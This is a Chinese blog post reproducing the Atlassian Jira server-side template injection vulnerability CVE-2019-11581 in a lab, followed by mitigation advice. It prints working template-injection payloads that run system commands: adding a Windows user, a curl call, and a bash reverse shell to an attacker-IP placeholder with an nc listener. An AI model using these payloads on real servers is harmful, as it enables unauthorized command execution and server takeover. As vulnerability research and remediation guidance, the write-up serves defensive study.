Atlassian JIRA服务器模板注入漏洞复现（CVE-2019-11581）

刺骨的言语ヽ痛彻心扉 2024-03-31 11:35 76阅读 0赞

#### 0x00 漏洞描述 ####

Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。

Atlassian Jira Server和Jira Data Center存在服务端模板注入漏洞，成功利用此漏洞的攻击者可对运行受影响版本的Jira Server或Jira Data Center的服务器执行任意命令，从而获取服务器权限，严重危害网络资产。

#### **0x01 CVE编号** ####

CVE-2019-11581

#### **0x02 漏洞危害等级** ####

**高危**

#### **0x03 漏洞影响范围** ####

AtlassianJira 4.4.xAtlassianJira 5.x.xAtlassianJira 6.x.xAtlassianJira 7.0.x

AtlassianJira 7.1.x

AtlassianJira 7.2.xAtlassianJira 7.3.xAtlassianJira 7.4.xAtlassianJira 7.5.xAtlassianJira 7.6.x < 7.6.14AtlassianJira 7.7.xAtlassianJira 7.8.xAtlassianJira 7.9.xAtlassianJira 7.10.xAtlassianJira 7.11.xAtlassianJira 7.12.xAtlassianJira 7.13.x < 7.13.5AtlassianJira 8.0.x < 8.0.3AtlassianJira 8.1.x < 8.1.2AtlassianJira 8.2.x < 8.2.3

#### 0x04 漏洞简析 ####

**1.利用前提条件：**

第一种，未授权代码执行利用条件：Jira已配置好SMTP服务器，且需开启“联系网站管理员表单”功能。(从WEB界面设计上看，实际上如果没配置SMTP服务器，无法开启此功能

第二种利用场景前提是拿到Jira管理员的权限，利用条件较难满足，这里主要分析第一种情况。原因在于atlassian-jira/WEB-INF/classes/com/atlassian/jira/web/action/user/ContactAdministrators 未对Subject(邮件主题)处进行过滤，用户传入的邮件主题被当作template(模板)指令执行。在任何一种情况下，成功利用此漏洞的攻击者都可在运行受影响版本的Jira Server或Jira Data Center的系统上执行任意命令。

**2.以下两种url漏洞验证方式：**

第一种无需管理员账户权限：[http://10.206.1.8:8080][http_10.206.1.8_8080][/secure/ContactAdministrators!default.jspa][secure_ContactAdministrators_default.jspa]

![1049983-20190929160435506-2057128619.png][]

![Image 1][]

第二种需管理员账户权限：[http://10.206.1.8:8080][http_10.206.1.8_8080]/secure/admin/SendBulkMail!default.jspa

![1049983-20190929160453086-1845493428.png][]

![Image 1][]

如果出现以下运行版本号则为存在漏洞。

#### 0x05 漏洞复现 ####

**1. 漏洞利用条件**

联系管理员处必须开启 (需要知道后台管理员账号密码)

**2.环境准备：**

Atlassian JIRAv7.13.0 (以该版本为例，该版本存在漏洞)下载地址：

https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-software-7.13.0-x64.exe

安装过程不再描述(按照提示进行安装，先在官方注册一个账号然后拿到一个试用期序列号并进行安装)，注意，到了邮件配置那一步经尽量选以后(默认就是)，然后进入后台配置。

**3.确认未登陆状态下漏洞的存在**

访问如下URL(无需管理员账户权限)：

[http://10.206.1.8:8080][http_10.206.1.8_8080]/secure/ContactAdministrators!default.jspa

如果提示如下图，这说明没有配置联系管理员是无法触发漏洞。

![Image 1][]

![1049983-20190929160515095-153253958.png][]

请登陆后台开启联系管理员，配置地址如下：

http://10.10.20.116:8080/secure/admin/EditApplicationProperties!default.jspa

默认是关闭的，需要配置了STMP发信后才能开启，配置STMP的时候可以测试连接，服务器必须开25端口，不然不能发邮件，下图是开启成功

![Image 1][]

![1049983-20190929160533856-1165109041.png][]

**4.未登陆状态下触发漏洞**

访问

[http://10.206.1.8:8080/secure/ContactAdministrators!default.jspa][http_10.206.1.8_8080_secure_ContactAdministrators_default.jspa]

![Image 1][]

![1049983-20190929160559813-640815047.png][]

在Subject填入payload，注意，我这里环境是windows机器，所以可以添加账号观察，Linux可以用反弹shell的代码等等,反正换成自己想执行的命令。

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('net user bk abc@ABC123 /add').waitFor()

![Image 1][]

![1049983-20190929160624366-590165021.png][]

发送了后可能会等一会儿，因为要加入邮件队列。这时候再上服务器执行net user查看，发现正是刚刚执行命令添加的账户。

![1049983-20190929160705244-185132501.png][]

![Image 1][]

**5. 登陆管理员账号触发漏洞**

登陆管理员账号，然后访问如下URL：

[http://10.206.1.8:8080/secure/admin/SendBulkMail!default.jspa][http_10.206.1.8_8080_secure_admin_SendBulkMail_default.jspa]

填入payload，如下，注意执行命令添加账号的账户名

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('net user bk01 abc@ABC123 /add').waitFor()

![1049983-20190929160729799-40122537.png][]

![1049983-20190929160844902-318079748.png][]

![Image 1][]

linux下可执行：

目标Jira系统可执行的POC

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://www.baidu.com').waitFor()

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('bash -i >& /dev/tcp/攻击者IP/2333 0>&1').waitFor()

攻击者主机执行:nc -lvvp 2333

#### 0x06 漏洞修复 ####

**1.临时处置建议**

若无法及时升级Jira，可采取以下缓解措施：

1.禁止访问http://ip:port/secure/ContactAdministrators!default.jspa

2.关闭联系网站管理员表单功能，具体步骤如下:

设置 => 系统 => 编辑设置 => 联系管理员表单处选择“关”，然后点击最下面的“更新”保存设置。

![Image 1][]

![1049983-20190929160909670-2093886280.png][]

编辑设置

![Image 1][]

![1049983-20190929160928627-1296800193.png][]

关闭联系网站管理员表单功能

**2.处置建议**

1.升级到不受漏洞影响的版本。

2.对[http://ip:port/secure/admin/SendBulkMail!default.jspa限制访问的源ip][http_ip_port_secure_admin_SendBulkMail_default.jspa_ip]

#### 0x07 参考文献 ####

[https://mp.weixin.qq.com/s/d2yvSyRZXpZrPcAkMqArsw][https_mp.weixin.qq.com_s_d2yvSyRZXpZrPcAkMqArsw]

[https://mp.weixin.qq.com/s/\_Tsq9p1pQyszJt2VaXd61A][https_mp.weixin.qq.com_s_Tsq9p1pQyszJt2VaXd61A]

[https://paper.seebug.org/982/][https_paper.seebug.org_982]

[https://www.jianshu.com/p/ddf1233d333f][https_www.jianshu.com_p_ddf1233d333f]

[https://github.com/jas502n/CVE-2019-11581][https_github.com_jas502n_CVE-2019-11581]

[https://www.jianshu.com/p/ddf1233d333f][https_www.jianshu.com_p_ddf1233d333f]

[http://ximcx.cn/post-158.html][http_ximcx.cn_post-158.html]

[http_10.206.1.8_8080]: http://10.206.1.8:8080/
[secure_ContactAdministrators_default.jspa]: http://ip:port/secure/ContactAdministrators!default.jspa
[1049983-20190929160435506-2057128619.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/7c0fa842b7824fa991c0882abca19bd0.png
[Image 1]: 
[1049983-20190929160453086-1845493428.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/90ec9254e7674657b14c0fd567500e69.png
[1049983-20190929160515095-153253958.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/f35a1e64f69642eeac8438ca667da4ed.png
[1049983-20190929160533856-1165109041.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/476444950d954afd9a4d3d0db78fad0f.png
[http_10.206.1.8_8080_secure_ContactAdministrators_default.jspa]: http://10.206.1.8:8080/secure/ContactAdministrators!default.jspa
[1049983-20190929160559813-640815047.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/cf766d4190ab48c480e8be1c0d05581a.png
[1049983-20190929160624366-590165021.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/f2c08be41c7c4698b0b37b72d21db60f.png
[1049983-20190929160705244-185132501.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/583dc963454244d2bf595ca591ce28a1.png
[http_10.206.1.8_8080_secure_admin_SendBulkMail_default.jspa]: http://10.206.1.8:8080/secure/admin/SendBulkMail!default.jspa
[1049983-20190929160729799-40122537.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/6388ce3dda0b46e28eaa88ad99758a94.png
[1049983-20190929160844902-318079748.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/91570c9d82344123ada020185af4b5d7.png
[1049983-20190929160909670-2093886280.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/47053a10fa3b4e809121ca44461f7328.png
[1049983-20190929160928627-1296800193.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/31/a03563a4341f4a648589ad7fc64ebf87.png
[http_ip_port_secure_admin_SendBulkMail_default.jspa_ip]: http://ip:port/secure/admin/SendBulkMail!default.jspa%E9%99%90%E5%88%B6%E8%AE%BF%E9%97%AE%E7%9A%84%E6%BA%90ip
[https_mp.weixin.qq.com_s_d2yvSyRZXpZrPcAkMqArsw]: https://mp.weixin.qq.com/s/d2yvSyRZXpZrPcAkMqArsw
[https_mp.weixin.qq.com_s_Tsq9p1pQyszJt2VaXd61A]: https://mp.weixin.qq.com/s/_Tsq9p1pQyszJt2VaXd61A
[https_paper.seebug.org_982]: https://paper.seebug.org/982/
[https_www.jianshu.com_p_ddf1233d333f]: https://www.jianshu.com/p/ddf1233d333f
[https_github.com_jas502n_CVE-2019-11581]: https://github.com/jas502n/CVE-2019-11581
[http_ximcx.cn_post-158.html]: http://ximcx.cn/post-158.html